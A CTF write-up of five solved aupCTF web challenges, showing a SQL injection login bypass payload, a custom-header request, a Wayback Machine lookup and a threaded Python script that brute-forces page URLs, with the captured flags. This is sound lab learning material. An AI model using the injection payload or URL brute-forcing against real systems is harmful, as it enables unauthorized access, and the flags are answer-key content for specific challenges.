Web challenges from aupCTF

5/7 challenges solved

Starter

image

Link: https://challs.aupctf.live/starter/

image

Flag is randomly placed in the site. I removed all the CSS styling which made the flag.

image

Flag: aupCTF{w45n't-th47-h4rd-r1gh7}

SQLi-1

image

Link: https://challs.aupctf.live/sqli-1/

I tried base admin as username and ' or 1=1 ; -- as password.

image

image

Flag: aupCTF{3a5y-sql-1nj3cti0n}

image

Link: https://challs.aupctf.live/header/

Going to site shows some Django python code:

def headar_easy(request):
    if request.META.get('HTTP_GETFLAG') == 'yes':
        context = {
            'flag': '[REDACTED]',
        }
        
        return render(request, 'aa/flag.html', context)
    
    return render(request, 'aa/index.html')

So I sent a request wih the header GETFLAG being yes using Postman

image

Flag: aupCTF{cust0m-he4d3r-r3qu3st}

Time-Heist

image

Hint: try looking for a tag named flag

Link: https://iasad.me/tags

I went to Web archive to find the possible tag named flag. There was one recently https://web.archive.org/web/20230605190025/https://iasad.me/tags

image

Going to https://web.archive.org/web/20230601061319/https://iasad.me/tags/flag/ and then to https://web.archive.org/web/20230601045526/https://iasad.me/blogs/flag/ and looking at source:

image

Flag: aupCTF{y0u-ar3-4-tru3-t1m3-tr4v3l3r}

Directory

image

Link: https://challs.aupctf.live/dir/

image

The flag is in one of the 1000 links, I created a python script to brute force it using threading:

import requests
import threading

url = "https://challs.aupctf.live/dir/page/"


def do(range_):
    for i in range(range_,range_+100):
        r = requests.get(url + str(i) + "/")
        if "No flag for you" not in r.text:
            print(i,r.text)


threads = []
for i in range(0, 10000, 100):
    t = threading.Thread(target=do, args=(i,))
    threads.append(t)
    t.start()

Within 2 seconds it got the flag at page 712:

712
<!DOCTYPE html>
<html>
<head>
    <title>You Found Me</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
        }
        h1, h2{
            text-align: center;
            margin-top: 50px;
        }

    </style>
</head>
<body>
    <h1>Here is your flag, You deserve it</h1>
    <br>
    <h2>The flag is: aupCTF{d1r3ct0r13s-tr1v14l-fl4g}</h2>
</body>
</html>

Flag: aupCTF{d1r3ct0r13s-tr1v14l-fl4g}